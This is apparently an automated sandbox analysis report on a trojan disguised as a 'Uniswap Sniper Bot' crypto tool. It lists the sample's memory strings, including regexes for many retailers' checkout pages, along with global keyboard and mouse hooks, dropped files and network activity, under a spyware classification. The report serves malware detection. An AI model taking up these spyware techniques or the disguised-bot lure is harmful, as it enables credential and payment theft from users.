Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/3966484/why-does-modulus-operator-return-fractional-number-in-ja
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/55718778/why-abortcontroller-is-not-defined
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/7860392/determine-if-string-is-in-base64-using-javascript
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://thekevinscott.com/emojis-in-javascript/#writing-a-regular-expression
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc6455#section-9.1
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://travis-ci.org/joemccann/dillinger)
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://travis-ci.org/joemccann/dillinger.svg?branch=master)
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tweetnacl.js.org
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp, Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://v8.dev/blog/v8-release-89
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.abebooks.com/servlet/(shopbasketpl
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.academy.com/shop/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.acehardware.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.adorama.com/als.mvc/cartview/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ae.com/us/en/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.altardstate.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.anthropologie.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.apple.com/(
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.att.com/((
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.basspro.com/shop/ajaxorderitemdisplayview/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bathandbodyworks.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bedbathandbeyond.com/store/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.belk.com/shopping-bag/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/cart(/
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bhphotovideo.com/(c/)?find/cart.jsp
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bloomingdales.com/my-bag/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.boostmobile.com/cart.html/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.buybuybaby.com/store/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.carid.com/cart.php/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chegg.com/shoppingcart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.cl.cam.ac.uk/%7Emgk25/ucs/utf8_check.c
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.containerstore.com/cart/list.htm/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.costco.com/checkoutcart(display)?view/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.crateandbarrel.com/checkout/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dickssportinggoods.com/orderitemdisplay/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/orderitemdisplay/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.dsw.com/en/us/shopping-bag/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.etsy.com/(
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.eyebuydirect.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.fingerhut.com/cart/index/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.finishline.com/store/cart/cart.jsp/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.freepeople.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gamestop.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.groupon.com/(checkout/)?cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.harborfreight.com/checkout/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.hmhco.com/hmhstorefront/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.hottopic.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.hsn.com/checkout/bag/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp, uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7FF5000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.jcpenney.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.jcrew.com/checkout/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.joann.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.kohls.com/checkout/shopping_cart.jsp$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.landsend.com/shopping-bag/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.llbean.com/webapp/wcs/stores/servlet/llbshoppingcartdisplay/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.lulus.com/checkout/bag/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.macys.com/((my-bag)
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282244557.0000000005920000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.medikoo.com/)
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.neimanmarcus.com/checkout/cart.jsp/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.nike.com/(
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.nordstrom.com/shopping-bag/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.officedepot.com/cart/shoppingCart.do/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.opticsplanet.com/checkout/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.overstock.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.petsmart.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.pier1.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.pokemoncenter.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.potterybarn.com/shoppingcart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.qvc.com/checkout/cart.html/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.redbubble.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.rei.com/shoppingcart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.revolve.com/r/shoppingbag.jsp/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.rockauto.com/en/cart(/(checkout)?)?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.saksfifthavenue.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.samsclub.com/(sams/)?cart/?
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.sephora.com/basket/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.shutterfly.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.staples.com/cc/mmx/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.sweetwater.com/store/cart.php/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.talbots.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.target.com/(co-)?cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.teacherspayteachers.com/cart(/checkout)?/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.therealreal.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.tractorsupply.com/tscshoppingcartview/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ulta.com/bag(/(empty
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.underarmour.com/(
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.urbanoutfitters.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.vans.com/shop/orderitemdisplay/
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.vitalsource.com/(
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.walgreens.com/cart/view-ui/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wayfair.com/(
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.weightwatchers.com/us/shop/checkout/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.westelm.com/shoppingcart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wiley.com/(
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.williams-sonoma.com/shoppingcart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/channel/UCdRihNiJ0tJ7xpFGKcwZcdQ
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zappos.com/cart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2281977249.0000000005120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.zennioptical.com/shoppingCart/?$
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2282860707.0000000006320000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://zod.dev

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443

Source: unknown

HTTPS traffic detected: 151.101.0.223:443 -> 192.168.2.5:50002 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\.pyp\python.exe	Windows user hook set: 0 mouse low level C:\Users\user\.pyp\python.exe
Source: C:\Users\user\.pyp\python.exe	Windows user hook set: 0 keyboard low level C:\Users\user\.pyp\python.exe

Source: C:\Users\user\.pyp\python.exe

Windows user hook set: 0 mouse low level C:\Users\user\.pyp\python.exe

Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2350544276.0000000006FB9000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_b12845e1-c

Source: C:\Windows\System32\tar.exe

File created: C:\Users\user\.pyp\DLLs\python_tools.cat

Jump to dropped file

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

Process token adjusted: Security

Jump to behavior

Source: unicodedata.pyd.21.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.21.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: libGLESv2.dll.0.dr	Static PE information: Number of sections : 12 > 10
Source: vulkan-1.dll.0.dr	Static PE information: Number of sections : 12 > 10
Source: ffmpeg.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll0.0.dr	Static PE information: Number of sections : 12 > 10
Source: libEGL.dll.0.dr	Static PE information: Number of sections : 12 > 10
Source: vk_swiftshader.dll0.0.dr	Static PE information: Number of sections : 12 > 10
Source: uniswap-sniper-bot-with-gui.exe0.0.dr	Static PE information: Number of sections : 15 > 10
Source: vk_swiftshader.dll.0.dr	Static PE information: Number of sections : 12 > 10
Source: libGLESv2.dll0.0.dr	Static PE information: Number of sections : 12 > 10
Source: libEGL.dll0.0.dr	Static PE information: Number of sections : 12 > 10
Source: uniswap-sniper-bot-with-gui.exe.0.dr	Static PE information: Number of sections : 15 > 10
Source: ffmpeg.dll0.0.dr	Static PE information: Number of sections : 11 > 10

Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2287080680.0000000006140000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs Uniswap Sniper Bot With GUI.exe
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2289742502.0000000006120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs Uniswap Sniper Bot With GUI.exe
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2351125703.0000000007420000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameX vs Uniswap Sniper Bot With GUI.exe
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2349630212.0000000006120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs Uniswap Sniper Bot With GUI.exe
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2354669303.0000000004F2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs Uniswap Sniper Bot With GUI.exe

Source: Uniswap Sniper Bot With GUI.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal72.troj.spyw.winEXE@54/1814@5/5

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe	Mutant created: \Sessions\1\BaseNamedObjects\deed1b2d-6a1c-5708-934a-7202254448da
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

File created: C:\Users\user\AppData\Local\Temp\nst5273.tmp

Jump to behavior

Source: Uniswap Sniper Bot With GUI.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'UNISWAP-SNIPER-BOT-WITH-GUI.EXE'

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Uniswap Sniper Bot With GUI.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Uniswap Sniper Bot With GUI.exe, 00000000.00000003.2350544276.0000000006FB9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT name FROM sqlite_master WHERE type='table';
Source: uniswap-sniper-bot-with-gui.exe, 00000007.00000000.2443020695.00007FF6A7C19000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
